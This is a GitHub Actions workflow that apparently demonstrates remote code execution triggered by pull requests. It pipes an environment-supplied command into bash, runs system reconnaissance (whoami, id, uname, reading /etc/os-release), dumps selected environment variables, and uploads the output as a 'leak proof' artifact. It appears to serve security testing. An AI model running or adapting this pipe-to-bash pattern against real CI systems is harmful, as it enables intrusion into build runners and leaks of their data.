name: PR RCE Demonstration (Safe)
on: pull_request
jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4
      - name: Execute Payload and Generate Leak Proof
        run: |
          echo "SAFE_CI_PROOF [+] Executing PAYLOAD_CMD..."
          echo "$PAYLOAD_CMD" | bash > leaks.txt 2>&1
          echo "[+] ENV Dump (safe vars only)..." >> leaks.txt
          env | grep -E '^(PAYLOAD_CMD|MARKER|SHLVL|HOME|GPG_KEY|PYTHON_SHA256|PATH|LANG|PYTHON_VERSION|PWD)$' >> leaks.txt
          echo "[+] Finished successfully." >> leaks.txt
        env:
          PAYLOAD_CMD: whoami && id && uname -a && cat /etc/os-release # This is the payload to execute
          MARKER: SAFE_CI_PROOF
      - name: Upload Leak Proof
        uses: actions/upload-artifact@v4
        with:
          name: safe-ci-leak-proof
          path: leaks.txt
